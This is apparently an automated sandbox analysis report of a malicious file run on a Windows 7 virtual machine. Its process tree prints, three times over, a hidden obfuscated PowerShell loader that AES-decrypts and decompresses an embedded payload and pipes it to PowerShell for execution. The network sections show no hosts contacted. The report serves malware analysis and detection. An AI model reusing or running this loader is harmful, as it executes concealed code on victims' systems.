Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 28, 2023, 1:44 p.m. | May 28, 2023, 2:18 p.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell - }
2648-
cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs | powershell -
2784-
powershell.exe powershell.exe $ITufmtMLHgVEL = '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';$XDMpCreVXQAD = 'b0trbUFVUE1PUkpvVVB5S0hHSVhXRkNpdHdxT2REbkg=';$bLWdYeFBFuhJS = New-Object 'System.Security.Cryptography.AesManaged';$bLWdYeFBFuhJS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$bLWdYeFBFuhJS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$bLWdYeFBFuhJS.BlockSize = 128;$bLWdYeFBFuhJS.KeySize = 256;$bLWdYeFBFuhJS.Key = [System.Convert]::FromBase64String($XDMpCreVXQAD);$WEAiH = [System.Convert]::FromBase64String($ITufmtMLHgVEL);$pyRnuLwCWDuo = $WEAiH[0..15];$bLWdYeFBFuhJS.IV = $pyRnuLwCWDuo;$hBIElkDucKiphjB = $bLWdYeFBFuhJS.CreateDecryptor();$PCFcWCWNsM = $hBIElkDucKiphjB.TransformFinalBlock($WEAiH, 16, $WEAiH.Length - 16);$bLWdYeFBFuhJS.Dispose();$xUKePqe = New-Object System.IO.MemoryStream( , $PCFcWCWNsM );$QcFLJ = New-Object System.IO.MemoryStream;$idFDAFHbprcw = New-Object System.IO.Compression.GzipStream $xUKePqe, ([IO.Compression.CompressionMode]::Decompress);$idFDAFHbprcw.CopyTo( $QcFLJ );$idFDAFHbprcw.Close();$xUKePqe.Close();[byte[]] $hzQbYlK = $QcFLJ.ToArray();$oPsDGyrbFbNs = [System.Text.Encoding]::UTF8.GetString($hzQbYlK);$oPsDGyrbFbNs
2884 -
powershell.exe powershell -
2920
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
